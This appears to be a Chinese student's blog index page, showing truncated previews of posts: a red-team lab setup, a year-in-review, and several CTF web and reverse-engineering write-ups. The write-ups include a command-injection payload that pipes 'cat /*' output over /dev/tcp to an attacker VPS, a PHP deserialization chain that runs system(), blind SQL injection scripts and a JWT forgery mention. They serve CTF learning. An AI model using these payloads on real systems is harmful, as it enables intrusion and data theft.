✋毫🧊有🧊1
✋毫🧊有🧊 一晚上睡不着爬起来学内网渗透,因为感觉你👱🏻这方面的经验多少是欠缺的
还是大一大二太有素质了。
靶场环境ATT&CK红队评估二套靶场靶场配置的时候有几个很死🐴的地方
WEB虚拟机密码不对需要回退到快照三
如果虚拟机🐶叫说回退不到,那就把前两个快照删了
使用administrator账户,第一次进入(密码为空)的时候需要更换密码为默认密码,进入WEB虚拟机后还要管理员权限进入对应文件夹。
C:\Oracle\Middleware\user_projects\domains\base_domain,以管理员权限运行startweblogic服务
死🐴的地方还有WEB虚拟机开始不出网,后面将WEB虚拟机连接外网的ip改到虚拟机网段内后才好
域控DC服务器内网ip:10.10.10.10
系统:Windows Server 2012 (64位)
用户名:de1ay
WEB服务器外网ip:192.168.25.140
内网ip:10.10.10.80
系统:Windows Server 2008(64位)
用户名:
PC域内主机内网ip:10.10.10.20 ...
2022年度总结
✋毫🧊的2022发生了很多事
其实在2021的时候,我就想写个年度总结,但是去年这个时候我好像还有两科没考完得复习,人都要玉玉了。等能写的时候已经一月中旬了,仔细一想2021也没几件大事那就不写了吧。
2021的话,用一张图就可以总结了
但是2022的✋毫🧊,期末考两门,最后一门19号就考了,还是开卷,剩下的作业也是几天就🐏了,反正出去我也会被🐏,不如想一想这个2022。
2022年1月1日的凌晨那会,应该是跟🍻群的家人们在夜彳亍。
凌晨2点多喝完酒出去夜彳亍,别人可能觉得多少有🧊(但我就是喜欢干别人觉得有🧊的事情😇),但是这个时候的大街上一般只有你自己,你在街上可以慢悠悠走,仿佛自己是这个地方的主人,不必为了什么事情去赶时间。比如当时拍下来的冒烟的🍄。
2022就这样开始了。
在一月的时候,✋毫🧊没干什么正事,干的唯一一件事情是第一次上了个钻石(说出来跟个小学生一样)。上个钻石,花不到100就能办到,但是为什么要跟个弱智一样提出来呢。因为我觉得这个过程虽然司🐴(指当时打一下午不掉分就是胜利),但是慢慢地在这个坐牢(如果在坐牢中能得到提升,可以马上呼叫锤石把✋ ...
最终汇报
d3ctf(这里使用共享文档的wp)
公号第5名
calc利用 os.system(log) ,反引号执行子命令开头1#注释绕过eval,末尾<绕过重定向,制表符绕过空格,最后cat /*重定向到vps上num=1%23%60cat%09/%2A%60%3E/dev/tcp/vpsip/2333%3C
ezpop(这里使用共享文档的wp)
换行绕最后的#,flag在当前目录
$fin1=new fin();
$what=new what();
$fin2=new fin();
$crow=new crow();
$fin3=new fin();
$mix=new mix();
$mix->m1="\r\nsystem('cat ./*');";
$fin3->f1=$mix;
$crow->v1=$fin3;
$fin2->f1=$crow;
$what->a=$fin2;
$fin1->f1=$what;
$str=urlencode( serialize($fin1));
echo $str;
dasc ...
你爹刷题6
[CISCN2019 华北赛区 Day1 Web2]ikun你👱🏻打开题目就出现这个
随便注册个号,有1000元
你👱🏻注意到了这个地方,应该是要搞个lv6的,但是看一圈没lv6的。
可能从这里就得写个脚本找了
import requests
url="http://6e89c84c-ec2a-4e9a-91ba-bafe514f5216.node4.buuoj.cn:81/shop?page="
for i in range(0,3000):
r=requests.get(url+str(i))
if 'lv6.png' in r.text:
print(i)
break;
找出来在180页
然后发现买不起6级号
乌鱼了
应该是要抓包修改了。
这里折扣能改,那必须狠狠薅羊毛了
然后被逮到
百度了一下,这里涉及JWT破解
这里可以了解一下JWT
https://www.cnblogs.com/cjsblog/p/9277677.html
这里用base64将JWT解码
得到
然后利用一个网站进行造谣 ...
DASCTF 2022
ezpop题目源码为
<?php
class crow
{
public $v1;
public $v2;
function eval() {
echo new $this->v1($this->v2);
}
public function __invoke()
{
$this->v1->world();
}
}
class fin
{
public $f1;
public function __destruct()
{
echo $this->f1 . '114514';
}
public function run()
{
($this->f1)();
}
public function __call($a, $b)
{
echo $this->f1->get_flag();
}
}
class what
{
...
你爹刷题5
[WUSTCTF2020]颜值成绩查询你👱🏻点进题目就看到这个
输入1试试
得到1伯昏
数字最多只能输到4
试了一下很明显是sql注入题目,试试异或1^1^1
插入sql语句
1^(ascii(substr((select(database())),1,1))>200)^1
大于200就查询不到了,明显是布尔盲注
0^1会出现1的内容
爆库名
import requests
import time
url = "http://5a84ccfd-c740-44de-a8f3-57db290c078a.node4.buuoj.cn/?stunum="
result = ""
i = 0
while (True):
i = i + 1
head = 32
tail = 127
while (head < tail):
mid = (head + tail) >> 1
payload = "if(ascii(substr(database(),%d,1))>%d,1,0)& ...
你爹刷题4
[BSidesCF 2019]FuturellaF12看到flag
有🍪吧
[BJDCTF2020]EasySearch进去是一个登陆页面
进去随便试了几个,回显都一样,试着用dirsearch扫描看能不能找到突破口
你👱🏻经过相关查询发现这道题的关键是swp,正好被你👱🏻扫描到了
下面放出源代码
<?php
ob_start();
function get_hash(){
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
$content = uniqid().$random;
return sha1($ ...
无职转生1
你👱🏻这学期要学逆向,期末需要offonline做5道逆向题
那你👱🏻得看一下逆向题了
easyre确实是easy了,F12+shift(可以将程序中所有的字符串列出来)即可拿捏
reverse1你👱🏻照样F12+shift看到了
跟着点进去看源🐴,这个str2沾点不对劲
跟进str2
可以看到一个格式很像flag的,但是直接交其实交不了,再看伪代码处,有个对str2的判断,这里用的是asc码
这里的意思就是把o换成0
也就是flag{hell0_w0rld}
reverse2你👱🏻反编译main函数,这个应该就是主题了吧
再找到貌似是flag的字符串
这里应该就是对{hacking_for_fun}进行变换了
这里很明显能看出来在遍历字符串,并将i和r换为1
所以flag为flag{hack1ng_fo1_fun}
内涵的软件
字符串这里把DBAPP换成flag就行了
新年快乐这道题首先需要用脱壳工具进行脱壳
脱壳后用F12找到含有flag的字符串得到主函数
这里就是跟HappyNewYear!进行比较
所以flag就是flag{HappyNe ...
你爹刷题3
你👱🏻寒假打了几次比赛,但是做出来的题跟打的比赛次数差不多
你👱🏻太拉胯了,只能继续看题
否则你👱🏻只能从CTF的世界里Get Out了
你👱🏻现在开学进入下赛季了,但是还是得刷点题
[0CTF 2016]piapiapia你👱🏻打开题目是这样
用dirsearch扫一下,扫到www.zip
下载
里面的源码一个一个审计
其中,在config文件里面你👱🏻发现了flag和username为root
尝试用root为username进行登陆,而意外进入的注册页面,注册完成后再进行登录,成功后进入update.php界面
这是profile的php部分源码
<?php
require_once('class.php');
if($_SESSION['username'] == null) {
die('Login First');
}
$username = $_SESSION['username'];
$profile=$user-> ...
你爹刷题2
你👱🏻寒假打了几次比赛,但是做出来的题跟打的比赛次数差不多
你👱🏻太拉胯了,只能继续看题
否则你👱🏻只能从CTF的世界里Get Out了
你👱🏻现在开学进入下赛季了,但是还是得刷点题
[WesternCTF2018]shrine打开题目可以看到源码,看起来不多
import flask
import os
app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
@app.route('/')
def index():
return open(__file__).read()
@app.route('/shrine/<path:shrine>')
def shrine(shrine):
def safe_jinja(s):
s = s.replace('(', '').replace(')', '')
blackl ...